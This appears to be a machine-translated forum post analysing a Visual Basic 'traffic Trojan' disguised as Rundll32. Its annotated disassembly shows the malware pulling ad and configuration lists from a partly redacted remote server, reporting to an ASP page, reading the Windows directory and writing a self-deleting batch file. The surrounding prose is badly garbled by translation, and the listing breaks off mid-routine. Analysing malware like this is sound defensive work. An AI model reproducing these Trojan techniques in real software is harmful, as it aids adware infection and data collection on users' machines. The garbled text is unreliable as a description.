After the system patch is completed, the online blind irrigation is still connected to www.net.cn. now .... put down his network horse, 8 error, really good. kill 98. nt.2000.xp. xpsp2.2003. I kept it myself and analyzed his Trojan. A traffic Trojan. Server. Now all the ponies are here.
Slightly shelled, written in VB.
00403DAD. FF15 54104000 call dword ptr ds: [<& msvbvm60. _ vbaHresu>; msvbvm60. _ vbaHresultCheckObj
00403DB3. 8985 E0FCFFFF mov dword ptr ss: [EBP-320], EAX
00403DB9. EB 0A jmp short Rundll32.00403DC5
00403DBB> C785 E0FCFFFF> mov dword ptr ss: [EBP-320], 0
00403DC5> 8B95 60 feffff mov edx, dword ptr ss: [EBP-1A0]
00403DCB. 8995 F8FCFFFF mov dword ptr ss: [EBP-308], EDX
00403DD1. C785 60 FEFFFF> mov dword ptr ss: [EBP-1A0], 0
00403DDB. 8B85 F8FCFFFF mov eax, dword ptr ss: [EBP-308]
00403DE1. 8985 34 feffff mov dword ptr ss: [EBP-1CC], EAX
00403DE7. C785 2 CFEFFFF> mov dword ptr ss: [EBP-1D4], 8
00403DF1. 8D95 2 cfeffff lea edx, dword ptr ss: [EBP-1D4]
00403DF7. 8D8D F8FEFFFF lea ecx, dword ptr ss: [EBP-108]
00403DFD. FF15 08104000 call dword ptr ds: [<& msvbvm60. _ vbaVarMo>; msvbvm60. _ vbaVarMove
00403E03. C745 FC 06000> mov dword ptr ss: [EBP-4], 6
00403E0A. C785 D4FDFFFF> mov dword ptr ss: [EBP-22C], Rundll32.0040>; UNICODE"Http://www.xxxxxxxx.com/tc/adset.txt"
00403E14. C785 CCFDFFFF> mov dword ptr ss: [EBP-234], 8
00403E1E. 8D95 ccfdffff lea edx, dword ptr ss: [EBP-234]
00403E24. 8D4D A0 lea ecx, dword ptr ss: [EBP-60]
00403E27. FF15 70114000 call dword ptr ds: [<& msvbvm60. _ vbaVarCo>; msvbvm60. _ vbaVarCopy
00403E2D. C745 FC 07000> mov dword ptr ss: [EBP-4], 7
00403E34. C785 D4FDFFFF> mov dword ptr ss: [EBP-22C], Rundll32.0040>; UNICODE"Http://www.xxxxxxxx.com/tc/adlist.txt"
00403E3E. C785 CCFDFFFF> mov dword ptr ss: [EBP-234], 8
00403E48. 8D95 ccfdffff lea edx, dword ptr ss: [EBP-234]
00403E4E. 8D8D 6 cffffff lea ecx, dword ptr ss: [EBP-94]
00403E54. FF15 70114000 call dword ptr ds: [<& msvbvm60. _ vbaVarCo>; msvbvm60. _ vbaVarCopy
00403E5A. C745 FC 08000> mov dword ptr ss: [EBP-4], 8
00403E61. C785 D4FDFFFF> mov dword ptr ss: [EBP-22C], Rundll32.0040>; UNICODE "asp" target = _ blank>Http://www.xxxxxxxx.com/tc/MMResult.asp"
00403E6B. C785 CCFDFFFF> mov dword ptr ss: [EBP-234], 8
00403E75. 8D95 ccfdffff lea edx, dword ptr ss: [EBP-234]
00403E7B. 8D4D 8C lea ecx, dword ptr ss: [EBP-74]
00403E7E. FF15 70114000 call dword ptr ds: [<& msvbvm60. _ vbaVarCo>; msvbvm60. _ vbaVarCopy
00403E84. C745 FC 09000> mov dword ptr ss: [EBP-4], 9
00403E8B. C785 D4FDFFFF> mov dword ptr ss: [EBP-22C], Rundll32.0040>; UNICODE"Http://www.xxxxxxxx.com/tc/adiepage.txt"
00403E95. C785 CCFDFFFF> mov dword ptr ss: [EBP-234], 8
00403E9F. 8D95 ccfdffff lea edx, dword ptr ss: [EBP-234]
00403EA5. 8D8D B8FEFFFF lea ecx, dword ptr ss: [EBP-148]
00403EAB. FF15 70114000 call dword ptr ds: [<& msvbvm60. _ vbaVarCo>; msvbvm60. _ vbaVarCopy
00403EB1. C745 FC 0A000> mov dword ptr ss: [EBP-4], 0A
00403EB8. C785 D4FDFFFF> mov dword ptr ss: [EBP-22C], Rundll32.0040>; UNICODE"Http://www.xxxxxxxx.com/tc/ieFavorites.txt"
00403EC2. C785 CCFDFFFF> mov dword ptr ss: [EBP-234], 8
00403ECC. 8D95 ccfdffff lea edx, dword ptr ss: [EBP-234]
00403ED2. 8D8D 7 cffffff lea ecx, dword ptr ss: [EBP-84]
00403ED8. FF15 70114000 call dword ptr ds: [<& msvbvm60. _ vbaVarCo>; msvbvm60. _ vbaVarCopy
00403EDE. C745 FC 0B000> mov dword ptr ss: [EBP-4], 0B
00403EE5. C785 D4FDFFFF> mov dword ptr ss: [EBP-22C], Rundll32.0040>; UNICODE "WinDir"
00403EEF. C785 CCFDFFFF> mov dword ptr ss: [EBP-234], 8
00403EF9. 8D95 ccfdffff lea edx, dword ptr ss: [EBP-234]
00403EFF. 8D8D 2 cfeffff lea ecx, dword ptr ss: [EBP-1D4]
00403F05. FF15 6C114000 call dword ptr ds: [<& msvbvm60. _ vbaVarDu>; msvbvm60. _ vbaVarDup
00403F0B. 8D8D 2 cfeffff lea ecx, dword ptr ss: [EBP-1D4]
00403F11. 51 PUSH ECX
00403F12. 8D95 1 cfeffff lea edx, dword ptr ss: [EBP-1E4]
00403F18. 52 PUSH EDX
00403F19. FF15 60104000 call dword ptr ds: [<& msvbvm60.rtcEnviron>; msvbvm60.rtcEnvironVar
00403F1F. C785 C4FDFFFF> mov dword ptr ss: [EBP-23C], Rundll32.0040>; UNICODE "undll32.exe"
00403F29. C785 BCFDFFFF> mov dword ptr ss: [EBP-244], 8
The program willHttp://www.xxxxxxxx.comAnd access tc/MMResult. asp.
Generate a file
00404DA2./EB 0A jmp short Rundll32.00404DAE // obtain the file path Stack
00404DA4> | C785 88 FCFFFF> mov dword ptr ss: [EBP-378], 0
00404DAE> 8B85 60 feffff mov eax, dword ptr ss: [EBP-1A0] // my program path is "D: fuck you"
00404DB4. 50 push eax // path to eax
00404DB5. 68 80274000 PUSH Rundll32.00402780; // generate killme. bat
00404DBA. FF15 48104000 call dword ptr ds: [<& msvbvm60. _ vbaStrCat>; msvbvm60. _ vbaStrCat
00404DC0. 8BD0 mov edx, EAX // file path + file name D: fuck youkillme. bat
00404DC2. 8D8D 5 cfeffff lea ecx, dword ptr ss: [EBP-1A4]
00404DC8. FF15 80114000 call dword ptr ds: [<& msvbvm60. _ vbaStrMov>; msvbvm60. _ vbaStrMove
00404DCE. 50 PUSH EAX
00404DCF. 6A 01 PUSH 1
00404DD1. 6A ff push-1
00404DD3. 6A 02 PUSH 2
00404DD5. FF15 28114000 call dword ptr ds: [<& msvbvm60. _ vbaFileOp>; msvbvm60. _ vbaFileOpen
00404DDB. 8D8D 5 cfeffff lea ecx, dword ptr ss: [EBP-1A4]
00404DE1. 51 PUSH ECX
00404DE2. 8D95 60 feffff lea edx, dword ptr ss: [EBP-1A0]
00404DE8. 52 PUSH EDX
00404DE9. 6A 02 PUSH 2
00404DEB. FF15 48114000 call dword ptr ds: [<& msvbvm60. _ vbaFreeSt>; msvbvm60. _ vbaFreeStrList
00404DF1. 83C4 0C add esp, 0C
00404DF4. 8D8D 40 feffff lea ecx, dword ptr ss: [EBP-1C0]
00404DFA. FF15 A8114000 call dword ptr ds: [<& msvbvm60. _ vbaFreeOb>; msvbvm60. _ vbaFreeObj
00404E00. C745 FC 23000> mov dword ptr ss: [EBP-4], 23
00404E07. 68 9C274000 PUSH Rundll32.0040279C; @ echo off
00404E0C. 6A 01 PUSH 1
00404E0E. 68 B4274000 PUSH Rundll32.004027B4